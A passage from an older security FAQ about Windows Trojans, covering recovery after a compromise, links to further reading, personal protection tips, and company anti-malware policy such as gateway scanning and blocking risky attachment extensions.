Accounting Data such as ISP passwords, ICQ, mIRC, FTP, web site passwords, e-mail address passwords are definitely known to the attacker. Contact your ISP about changing your dial-up password if you're using such a connection. Immediately change your ICQ, mIRC passwords if they're still the same. (Often attackers won't change any of your logins and passwords to fool you into thinking that everything is OK, so there is a good chance that you will still be able to recover from the compromise). Change your web based e-mail passwords and do check your information that is stored there, because password retrieval services for various e-mail providers such as Yahoo and Hotmail use this info combined with a "Secret Question" for password retrieval. Attackers often change the info, the answer to the secret question and many other things that will get them easily back into your mailbox, whether you've changed your pass or not.

If you're taking advantage of the handy Address Book feature in your e-mail service and have a list full of the e-mail addresses of friends, colleagues, etc. there is a real possibility that the attacker has sent them a trojan and has possibly infected them too. Mail all of these people and ask them about whether they have received any files from your mailbox, inform them someone else might know your e-mail password so that they'll be able to take appropriate actions such as checking their machines for Trojans. Do the same with the people from your ICQ contact list as they might be targeted too.

Check your HDD for abnormal activities like a lot of free space missing etc. Search for warez software and as I have mentioned, kiddie-porn archives.

Think for a while about the sensitive information you have had on your machine before the compromise, and if you are absolutely certain that the attacker may now posses this information, then take appropriate action, such as informing any institutions that own the sensitive data that a breach has occurred.

Scan your machine with Anti-Virus scanner, as the attacker could have placed some virus or infected macro documents on your machine to do destructive things despite the fact that the attacker no longer has access to your machine.

Monitor your processes BEFORE and AFTER connecting to the Internet, as some trojans start when they detect Internet connection. Don't be fooled again, be very suspicious.

14.Are there any other quality papers concerning the Windows Trojans subject?



Yes, there are. Follow the links below:



http://secinf.net/trojans/The_Complete_Windows_Trojans_Paper.html

http://www.jmu.edu/computing/info-security/engineering/issues/remote.shtml

http://members.ozemail.com.au/~netsafe/trojan_index.html

http://researchweb.watson.ibm.com/antivirus/SciPapers/Whalley/inwVB99.html

http://researchweb.watson.ibm.com/antivirus/SciPapers/Smoke/smoke.html

http://www.frame4.com/content/files/the_gentle_art_of_trojan_horsing_under_windows.txt

http://www.frame4.com/content/files/what_trojan.pdf




15.Are there any recommended resources regarding further information on the topic?


Windows Trojans pose a significant threat to the security of your computer; hence the Internet is filled with sites that discuss the topic. Follow the links below:



http://www.megasecurity.org/

http://www.trojan.ch/

http://www.trojanforge.net/

http://packetstormsecurity.org/trojans

http://www.pcflank.com/

Packages Review Web Sites:



http://www.anti-trojan-software-reviews.com/

http://www.staff.uiuc.edu/~ehowes/trojans/tr-tests.htm

http://www.wilders.org/anti_trojans.htm

http://www.firewallguide.com/anti-trojan.htm
 
16.Can you provide me with tips in order to protect myself, as well as prevent possible infections?



Here's a summary of the whole FAQ. You'll learn how to behave in a secure manner while reading these tips, and don't forget that they could be a lifesaver as far as Windows Trojan threats are concerned.



Never accept a file even it is from some friend. You're never absolutely sure who's on the other side of the computer at any given moment. If you really need this file, let's say it's some presentation or a work paper, find other ways such as by telephone and verify that the file is indeed from your friend. Yeah it will take you some time and slow you down a bit, but by being paranoid about the attachments you may receive you won't get infected in this way.

When executing files, first check their type. Is it really a .doc or it's some executable with a .doc icon?

Update your Anti-Virus and Anti-Trojan package signature files regularly, if possible EVERY day for maximum protection, as new trojans and viruses are discovered every day. Most of the detection software have functions like scheduling scans so if you are away from your machine during the night but you leave it switched on, why not consider to schedule a scan and update every night? Doing so will ensure your maximum protection.

Make sure you always have the latest version of the software you're using as new bugs appear very often and programs are regularly updated. Check often to see if there are bugs and/or other problems that have been found in the software that may potentially put your system at risk - and patch/update your system(s) accordingly. Some software has an option to check for the latest version of the software from the vendor's web site; make use of it.

Take several minutes and regularly check the processes on your machine with the software I have reviewed above. You'll be surprised at what you may detect sometimes.

It's vital to understand the risk of getting software from someone you have just met, or from someone that you have only had several ICQ, IRC conversations with.

Consider freeware programs as very risky software to download, and try searching for some reviews of the program before running it.

Carefully read the help files that come with your detection software in order to be able to use them to their full capacity.

Download software ONLY from its official page(s) or dedicated mirror web site. Never get the latest version of mIRC, ICQ or from some site you've never heard about such as from some free web space provider like Geocities. Consider it as an untrusted site and do NOT download anything from there.

If you are playing with trojans you can also get infected as there are trojans or other software that are already infected and is waiting for someone with not so much knowledge on the topic to download and use it.

Don't be so naive in regards to everything that you see on the Internet or in regards to what various sites offer you don't download any software you've never heard about.


17.How should we deal with potential malware problems in our company?


Security Policy



First of all you should establish an Anti-Malware Policy, guiding the staff members on the process of protecting critical company data from destruction or exposure. It needs to clearly state their responsibilities while using any of the company's Information Resources, thus making sure that it will be easily understood and properly implemented later. You should define what is allowable and what is not, what they should and what they shouldn't do in order to keep their workstations, as well as the company's network free of malware. Keep it short, precise and easy to understand, know your audience before your start building it, measure their computer/security level skills for maximal effectiveness. A sample Anti-Virus Policy can be found here.



Gateway Protection



You might consider using Gateway Protection, detecting and blocking malware at the Server level before reaching the workstations. A few reasonable products for this activity are:



Symantec AntiVirus Gateway Solution

Symantec AntiVirus for SMTP Gateways

Symantec Anti-Virus Corporate Edition

GFI MailSecurity
GFI DownloadSecurity
Content Blocking



Another valuable strategy that might be implemented, in the company's effort to protect its critical data from malware, is to filter known to be dangerous and potentially destructive file extensions at the Server level. These include: .exe, .com, .vbs, .scr, .asd, .asf, .asx, .bas, .bat, .chm, cmd, .com, .dll, .exe, .hlp, .hta, .hto, .js, .jse, .link, .lnk, .pif, .reg, .scr, .vb, .vbe, .vbs, .wsf, .wsh, and .wsc. A list of dangerous extensions may be found here.



Whenever someone from the company needs to receive a specific attachment having one of these extensions, the receiver might ask the sender to change the file's extension, and in this way confirms that indeed, a known person has sent the attachment.


18.How should we deal with the dangers of Free E-mail providers, as far as protecting against Malware is concerned?


In your Anti-Malware Policy, you need to state whether the use of Free E-mail providers is allowed or it is strictly prohibited. Educate them on the problem of potentially destructive attachments, downloaded from their external e-mail and run on the company's network. On the other hand, if the use of these services is prohibited due to security policy, then block access to these and let your staff members know that the proper use of the E-mail system is being strictly monitored.
Read more...